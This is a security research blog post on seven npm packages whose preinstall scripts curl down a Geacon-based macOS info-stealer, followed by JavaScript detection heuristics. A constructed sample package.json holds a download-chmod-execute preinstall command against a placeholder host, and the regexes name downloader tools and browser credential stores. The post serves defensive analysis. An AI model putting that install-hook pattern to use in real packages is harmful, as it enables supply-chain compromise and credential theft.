npm packages deploy new macOS malware

A new malware payload is being delivered via npm packages. The npm user hi_ops published seven packages, each of which deploys a new macOS malware sample.

 

[Screenshot: npm-packages-deploy-malware]

How is the malware delivered?

The delivery mechanism is simple. Each package contains a single file, package.json. Its preinstall lifecycle script, which npm runs automatically during `npm install` before the package is ever imported or read, executes a curl command that downloads the payload from an Aliyun (Alibaba Cloud) URL.

[Screenshot: aliyun-curl-payload]

What does the malware do?

The malware binary is written in Go and compiled as a 64-bit Mach-O macOS executable. To my untrained eye it appears to be a macOS-specific info-stealer. It feels similar to last year’s “Macstealer” malware, but under the covers it is based on the Geacon project. Geacon is a Golang rewrite of the Cobalt Strike Beacon, so a sample built on it is a command-and-control implant first, with the stealer behaviour described below layered on top.

Initially the executable performs system discovery, identifying the operating system and hardware it is running on and listing the executables present on the system. It then opens and reads /etc/master.passwd (the BSD password database, which is readable only by root, so that read only succeeds if the install ran with elevated privileges) and runs Apple’s eficheck utility to identify which firmware the machine is running.

[Screenshot: malware-runs-eficheck]

The malware then looks for browser caches, cookies, and local storage. It searches for iCloud accounts, browser plugins, and other locations that store credentials.

[Screenshot: places-malware-looks]

The malware also tries to steal session credentials for hundreds of websites; the screenshots below list the URLs it checks.

[Screenshot: urls-opened-steal-sessions]
[Screenshot: more-urls-session-stealer]
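The three behaviours above (reading /etc/master.passwd, spawning eficheck, and touching browser credential stores) are each unremarkable on their own but rarely occur together in one non-Apple process. The following is an added example, not code from the original post, that correlates them per process over a constructed stream of endpoint events. The event schema (ts, pid, ppid, exe, type, path) is an assumption, not any vendor’s format, and the sample events are constructed to mimic the described sample running as /tmp/.x.

```javascript
// Added example, not from the original post: per-process correlation of the
// behaviours described above. Event field names are an assumption, and the
// sample events are constructed, not captured from the real malware.
'use strict';

const MASTER_PASSWD = '/etc/master.passwd';
const EFICHECK = /\/eficheck$/;
// Well-known browser cookie and login stores on macOS.
const CRED_STORE = /\/(Cookies|Login Data|cookies\.sqlite|logins\.json|Cookies\.binarycookies)$|\/Local Storage\//;

// Returns one hit per process that shows at least two independent indicators.
function detectStealer(events) {
  const procs = new Map();
  const get = (pid, exe) => {
    if (!procs.has(pid)) {
      procs.set(pid, { pid, exe, readMasterPasswd: false, spawnedEficheck: false, credStores: new Set() });
    }
    const p = procs.get(pid);
    if (exe && !p.exe) p.exe = exe;
    return p;
  };

  for (const ev of events) {
    const p = get(ev.pid, ev.exe);
    if (ev.type === 'exec' && ev.ppid !== undefined && EFICHECK.test(ev.exe)) {
      // eficheck itself is Apple's tool; the parent that launched it is what matters.
      get(ev.ppid).spawnedEficheck = true;
    } else if (ev.type === 'open') {
      if (ev.path === MASTER_PASSWD) p.readMasterPasswd = true;
      if (CRED_STORE.test(ev.path)) p.credStores.add(ev.path);
    }
  }

  const hits = [];
  for (const p of procs.values()) {
    const indicators = [];
    if (p.readMasterPasswd) indicators.push('read /etc/master.passwd');
    if (p.spawnedEficheck) indicators.push('spawned eficheck');
    if (p.credStores.size >= 3) indicators.push(`opened ${p.credStores.size} browser credential stores`);
    // A browser opening its own cookie jar yields at most one indicator;
    // require two independent behaviours before alerting.
    if (indicators.length >= 2) hits.push({ pid: p.pid, exe: p.exe, indicators });
  }
  return hits;
}

// Constructed sample events (placeholder paths, user and profile names).
const SAMPLE_EVENTS = [
  { ts: 1, pid: 501, ppid: 1, exe: '/tmp/.x', type: 'exec', argv: ['/tmp/.x'] },
  { ts: 2, pid: 501, exe: '/tmp/.x', type: 'open', path: '/etc/master.passwd' },
  { ts: 3, pid: 502, ppid: 501, exe: '/usr/libexec/firmwarecheckers/eficheck/eficheck', type: 'exec', argv: ['eficheck'] },
  { ts: 4, pid: 501, exe: '/tmp/.x', type: 'open', path: '/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies' },
  { ts: 5, pid: 501, exe: '/tmp/.x', type: 'open', path: '/Users/alice/Library/Application Support/Google/Chrome/Default/Login Data' },
  { ts: 6, pid: 501, exe: '/tmp/.x', type: 'open', path: '/Users/alice/Library/Application Support/Firefox/Profiles/abc.default/cookies.sqlite' },
  // Benign contrast: the browser touching its own cookie store.
  { ts: 7, pid: 600, ppid: 1, exe: '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome', type: 'exec', argv: ['Google Chrome'] },
  { ts: 8, pid: 600, exe: '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome', type: 'open', path: '/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies' },
];

for (const hit of detectStealer(SAMPLE_EVENTS)) {
  console.log(`pid ${hit.pid} (${hit.exe}): ${hit.indicators.join('; ')}`);
}
```

Only the process running as /tmp/.x is reported; Chrome reading its own cookie jar and eficheck itself produce no alert. In a real deployment the event source would be Apple’s Endpoint Security framework or an EDR feed, and the credential-store path list should be extended to whatever browsers your fleet runs.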

What can you do?

Unfortunately, at the time of writing none of these packages has been flagged as malicious, so tooling that relies on package reputation or known-bad signatures would not have caught them. VirusTotal does not consider the package malicious, and when I ran the malware binary through Joe Sandbox it did not classify the file as malicious either. You can check out the public analysis here.

In general, it is a good idea not to install npm packages blindly. If you know what to look for, there are clear signals that these packages are dodgy. All seven contain a single file, package.json, which is one of several flags you can use to judge whether a package is legitimate: a package that ships no code of its own has no reason to exist beyond whatever its scripts do. In this case the packages do exactly one thing, run an install-time script that delivers the malware payload via curl. Any preinstall, install or postinstall script that downloads or executes something deserves a look before you install, and `npm install --ignore-scripts` stops those hooks from running at all (at the cost of breaking the minority of legitimate packages that depend on them). Pretty easy to see if you look, but you have to be looking. 🙂
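To make the delivery mechanism and the “signals” above concrete, here is an added example, not code from the original post or from any npm tooling, that scores a package from its file list and parsed package.json. The suspect package is constructed to mirror the pattern described (a lone package.json whose preinstall runs curl against a remote URL); its name and URL are placeholders, not the real ones, and a constructed ordinary package is included for contrast.

```javascript
// Added example, not code from the original post: heuristics for spotting an
// npm package whose only job is to run a lifecycle script that fetches a
// payload. Package names and the URL below are placeholders.
'use strict';

// Lifecycle hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Tools that download remote content or execute what was downloaded.
const FETCH_OR_EXEC = /\b(curl|wget|bash|sh|python3?|node\s+-e|chmod\s+\+x|base64\s+(-d|--decode))\b/;
const REMOTE_URL = /https?:\/\/[^\s"']+/g;

// files: paths inside the published tarball; pkg: parsed package.json.
// Returns { score, findings }; a higher score is more suspicious.
function assessPackage(files, pkg) {
  const findings = [];
  const scripts = pkg.scripts || {};

  // Signal 1: nothing but package.json, so the package ships no code of its own.
  if (files.every(f => f === 'package.json')) {
    findings.push('package contains only package.json');
  }

  // Signal 2: an install-time hook that downloads or executes something.
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    if (FETCH_OR_EXEC.test(cmd)) {
      findings.push(`${hook} runs a downloader or interpreter: ${cmd}`);
    }
    for (const url of cmd.match(REMOTE_URL) || []) {
      findings.push(`${hook} contacts ${new URL(url).hostname}`);
    }
  }

  // Signal 3: wants to run at install time yet has no entry point and no deps.
  if (!pkg.main && !pkg.dependencies && INSTALL_HOOKS.some(h => scripts[h])) {
    findings.push('install hook present but no main and no dependencies');
  }

  return { score: findings.length, findings };
}

// Constructed sample shaped like the packages in the post (placeholder values).
const SUSPECT_FILES = ['package.json'];
const SUSPECT_PKG = {
  name: 'placeholder-pkg',
  version: '1.0.0',
  scripts: {
    preinstall: 'curl -s https://placeholder-bucket.oss.aliyuncs.com/payload -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x',
  },
};

// A constructed ordinary package for contrast.
const BENIGN_FILES = ['package.json', 'index.js', 'README.md'];
const BENIGN_PKG = { name: 'placeholder-lib', version: '2.1.0', main: 'index.js', scripts: { test: 'node test.js' } };

for (const [files, pkg] of [[SUSPECT_FILES, SUSPECT_PKG], [BENIGN_FILES, BENIGN_PKG]]) {
  const { score, findings } = assessPackage(files, pkg);
  console.log(`${pkg.name}: score ${score}`);
  findings.forEach(f => console.log('  - ' + f));
}
```

The suspect package trips all four checks; the ordinary package trips none. The file list comes from `npm pack --dry-run` or from unpacking the tarball, which is the point: you inspect what is actually published, not the repository it claims to come from.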


Paul McCarty

SourceCodeRed.com Security Research & Trainer

 

https://www.linkedin.com/in/mccartypaul/

Read about Software Supply Chain Red Teaming